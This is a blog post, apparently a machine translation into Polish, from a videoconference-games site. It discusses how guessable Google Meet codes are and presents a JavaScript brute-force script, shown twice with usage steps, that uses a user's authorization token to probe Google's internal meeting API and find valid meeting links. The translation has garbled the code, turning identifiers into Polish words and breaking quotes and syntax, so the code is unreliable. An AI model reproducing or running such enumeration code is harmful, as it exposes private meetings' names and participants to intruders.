Visio – Utknij w Google Meet | Dyrk, Dyna Meet – Visio
Poznaj Visio
Contents
randomize = () => dico = diCo.Podział (”).Mapa (wartość => (< value, sort: Math.random() >)).zaklęcie ((a, b) => a.zaklęcie – b.zaklęcie).Mapa ((< value >) => Wartość).Dołączyć (”),
NewPatternkey = () => “xxx-xxxx-xxx”.Podział (”).Mapa (c => c == ‘-‘?Ciąg c.From Charcode (matematyka.Podłoga (matematyka.Random ()*25) +97)).Dołączyć (”),
Key = newPatternkey (), licznik = 20;
Następny = () => klucz.Podział (”).Mapa (e => e == ‘-‘ ? E: Dico [Dico.Indeks (e) + 1> = diCo.długość ? 0: Dico.Indeks (e) + 1]).Dołączyć (”),
Licznik = 0;
MeetLink = ‘https: // spotykaj się.Google.com/’, dostępny toe = () => xhr = nowy xmlhttprequest ();
If (licznik ++> = 20) licznik = 0;
Key = newPatternkey ();
Randomize ();
>
Key = następny ();
xhr.Open („Get”, MeetLink + Key);
xhr.AddEventlisner („ładuj”, (e) => fetch (MeetLink.Conat (“/$ rpc/google.RTC.spotkania.V1.MeetingSpaceService/DessistiMeetingSpace ”),„ Nagłówki ”:„ Autoryzacja ”: autoryzacja,
„Content-Type”: „Application/X-Protobuf”,
„X-Goog-Adep-Key”: E.cel.odpowiedzialność.Mecz (/\ [“https \: \/\/spotykaj \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
„X-Goog-Authuse”: „0”,
„X-Goog-incode-réspose-if-executable”: „base64”,
„X-Goog-Meeting-identifier”: BTOA (‘\ b \ x02 \ x12 \ f’.Conat (klucz)),
>,
„Ciało”: „\ n \ f”.Conat (klucz, „0 \ u0001”),
„Metoda”: „Post”
>).Następnie (e => e.Text ())
.następnie (e => settimeout (dostępny, 100);
konsola.Log (MeetLink.Conat (klucz).BeautifyDisplay (38), (e.Zamień (/[^a-za-z0-9]/g, „”)+„”).BeautifyDisplay (38));
>);
>);
xhr.Wysłać ();
>;
Strunowy.prototyp.BeautifyDisplay = funkcja (rozmiar) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >rozmiar ? tekst.Długość: rozmiar)).Podłoże (0, rozmiar).Conat (‘|’); >,
konsola.Jasne ();
dostępny ();
>) ()
Dyrk
Obecnie pracując w dziedzinie cyberbezpieczeństwa, regularnie stawiam czoła dość trywialne sytuacje.
Najnowsze, wtargnięcie osoby podczas spotkania .
Na szczęście ze względu na bezpieczeństwo spotkanie Google zawierało funkcję umożliwiającą zarówno ostrzeżenie uczestników, że dana osoba stara się dołączyć do wideokonferencji, ale także zaakceptować lub odmówić.
Jednak to wydarzenie zachęca mnie do zadawania sobie wielu pytań .
Złożoność linku Google Meet
Po pierwsze, w jaki sposób osoba może połączyć się z linkiem spotkania bez zaproszenia ?
Musimy rozważyć prostotę linku: https: // Google.poznać.com/Xxx -yyyy -zzzz
Xxx -yyyy -zzzz są tylko postaciami alfabetycznymi między A i Z, tj. 27 możliwych kombinacji dla każdej postaci.
Dla matematyków jest zatem:
27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 możliwe kombinacje .
Link Google Meet Meoge Link
Chociaż jesteśmy teraz w stanie lepiej zrozumieć, w jaki sposób budowane są linki naszych obligacji konferencyjnych „Google Meet”, istnieje bardzo ważny aspekt, który należy wziąć pod uwagę . Długość życia linku Google Meet !
Rzeczywiście, każdy może wygenerować spotkania Google w kilku kliknięciach.
Ale po kilku dniach, tygodniach lub miesiącach . Linki nie są już ważne.
Wygenerowane linki mają zatem pewien okres ważności .
Wyjątek sprawiają, że „powtarzające się” zdarzenia i tutaj staje się interesujące.
W biznesie istnieje wiele możliwości regularnego organizowania (zespół / biznes, codzienne, tygodniowe, miesięczne,, . )).
Gdy pracownik generuje tego typu zdarzenie w swoim porządku obrad, automatycznie generowany jest link Google Meet. Ten jest niezmienny.
Więc za każdym razem będziesz mieć ten sam link do tego wydarzenia.
Z odrobiną JavaScript i brutalnej siły ?
Przy wszystkich tych elementach jesteśmy teraz przygotowani do zamiatania wszystkich możliwości i osiągnięcia wysokich prawdopodobieństw w celu wykrycia linków do wideokonocjatów !
Mam więc trochę retro, który jest przedmiotem obsługi Google, aby napisać kod JavaScript, który wypróbuje nieskończoną liczbę kombinacji
(C) Dyrk.Org 2023-2024 – Roulette Meet’s Roulette
(1) Uruchom ten skrypt na https: // Google.poznać.com
)
Niech autoryzacja = “SAPISIDHASH XXXXXXXXXXXXXX_XXXXXXXXXXXXXXXXXXXXXXXXXXXX“, dico =” abcdefghijklmnopqrstuvxz “,
randomize = () => dico = diCo.Podział (”).Mapa (wartość => (< value, sort: Math.random() >)).zaklęcie ((a, b) => a.zaklęcie – b.zaklęcie).Mapa ((< value >) => Wartość).Dołączyć (”),
NewPatternkey = () => “xxx-xxxx-xxx”.Podział (”).Mapa (c => c == ‘-‘?Ciąg c.From Charcode (matematyka.Podłoga (matematyka.Random ()*25) +97)).Dołączyć (”),
Key = newPatternkey (), licznik = 20;
Następny = () => klucz.Podział (”).Mapa (e => e == ‘-‘ ? E: Dico [Dico.Indeks (e) + 1> = diCo.długość ? 0: Dico.Indeks (e) + 1]).Dołączyć (”),
Licznik = 0;
MeetLink = ‘https: // spotykaj się.Google.com/’, dostępny toe = () => xhr = nowy xmlhttprequest ();
If (licznik ++> = 20) licznik = 0;
Key = newPatternkey ();
Randomize ();
>
Key = następny ();
xhr.Open („Get”, MeetLink + Key);
xhr.AddEventlisner („ładuj”, (e) => fetch (MeetLink.Conat (“/$ rpc/google.RTC.spotkania.V1.MeetingSpaceService/DessistiMeetingSpace ”),„ Nagłówki ”:„ Autoryzacja ”: autoryzacja,
„Content-Type”: „Application/X-Protobuf”,
„X-Goog-Adep-Key”: E.cel.odpowiedzialność.Mecz (/\ [“https \: \/\/spotykaj \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
„X-Goog-Authuse”: „0”,
„X-Goog-incode-réspose-if-executable”: „base64”,
„X-Goog-Meeting-identifier”: BTOA (‘\ b \ x02 \ x12 \ f’.Conat (klucz)),
>,
„Ciało”: „\ n \ f”.Conat (klucz, „0 \ u0001”),
„Metoda”: „Post”
>).Następnie (e => e.Text ())
.Następnie (e =>
Settimeout (dostępny, 100);
konsola.Log (MeetLink.Conat (klucz).BeautifyDisplay (38), (e.Zamień (/[^a-za-z0-9]/g, „”)+„”).BeautifyDisplay (38));
>);
>);
xhr.Wysłać ();
>;
Strunowy.prototyp.BeautifyDisplay = funkcja (rozmiar) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >rozmiar ? tekst.Długość: rozmiar)).Podłoże (0, rozmiar).Conat (‘|’); >,
konsola.Jasne ();
dostępny ();
>) ()
Aby to wszystko działać, będzie konieczne:
- Otwórz stronę https: // spotykaj się.Google.com
- Otwórz konsolę programistów
- Na karcie „Network” odfiltruj pobór / xhr i odzyskaj token tokena“Upoważnienie”
- Skopiuj i wklej powyższy kod źródłowy i umieść na miejscu wskazanym tokenem.
- Sprawdź klawisz „wejście” na klawiaturze.
Odzyskiwanie tokenu „autoryzacji”:
Dla ciekawych powinien wyglądać wynik tego skryptu w akcji.
Dlatego zauważamy linie, które informują nas, że przestrzeń do wideokonferencji nie istnieje.
I inni, którzy postawili nas na dowód konferencji ! Dlatego wskazując, że łącze jest prawidłowe;)
Nie spodziewaj się jednak w ciągu kilku sekund na linku spotkań ^^
(Chyba że jesteś małym szczęśliwym człowiekiem)
Będziesz musiał być wielką cierpliwością, pozwalając jej trwać co najmniej pół godziny.
Wniosek
Nie panikuj, że istnieje większa liczba szczęścia, aby znaleźć ważny link Google Meet Link niż wygrana Loto.
Uwaga ! Osoba, która przychodzi ważny dostęp do linku do niektórych informacji bez konieczności połączenia:
Nazwa spotkania (zatem unikaj poślizgu poufnych informacji) i podłączonych uczestników (wszyscy lub gra).
Poznaj Visio
Napad online
Do 1000 graczy jednocześnie
Platforma łatwa do dostępu w Visio
Horyzont 2024
Do 1000 graczy jednocześnie
Platforma łatwa do dostępu w Visio
Gdzie jest Charlie ?!
Do 1000 graczy jednocześnie
Platforma łatwa do dostępu w Visio
Misja Enigma
Do 1000 graczy jednocześnie
Platforma łatwa do dostępu w Visio
Świadomość cyberbezpieczeństwa
Do 5000 graczy jednocześnie
Platforma łatwa do dostępu w Visio
Zapisz Boże Narodzenie !
Do 1000 graczy jednocześnie
Platforma łatwa do dostępu w Visio
Copyright © 2023 – Dyna’meet
Zarządzaj zgodą na pliki cookie
Aby zaoferować najlepsze doświadczenia, używamy technologii, takich jak pliki cookie do przechowywania i/lub dostępu do informacji urządzeń. Zgoda na te technologie pozwoli nam przetwarzać dane, takie jak zachowanie nawigacyjne lub unikalne identyfikatory na tej stronie. Fakt, że nie wyraża zgody lub wycofanie zgody, może mieć negatywny wpływ na pewne cechy i funkcje.
Funkcjonalne funkcjonalne zawsze aktywowane
Pamięć lub dostęp techniczny jest ściśle konieczny pod koniec uzasadnionego zainteresowania, aby umożliwić korzystanie z określonej usługi wyraźnie żądane przez subskrybenta lub użytkownika, lub wyłącznie w celu przesyłania transmisji komunikacji w sieci komunikacji elektronicznej.
Preferencje preferencje
Przechowywanie lub dostęp techniczny jest niezbędny w celu uzasadnionego zainteresowania preferencjami, które nie są wymagane przez subskrybenta lub osobę korzystającą z Usługi.
Statystyka statystyczna
Przechowywanie lub dostęp techniczny, który jest używany wyłącznie do celów statystycznych. Przechowywanie lub dostęp techniczny, który jest używany wyłącznie w anonimowych celach statystycznych. W przypadku braku wezwania do pojawienia się, dobrowolna zgodność ze strony dostawcy dostępu do Internetu lub dodatkowych zapisów od strony trzeciej, informacje przechowywane lub wyodrębnione na tym końcu.
Dostęp do przechowywania lub techniczny jest niezbędny do tworzenia profili użytkowników w celu wysyłania reklam lub śledzenia użytkownika na stronie internetowej lub na kilku stronach internetowych o podobnych celach marketingowych.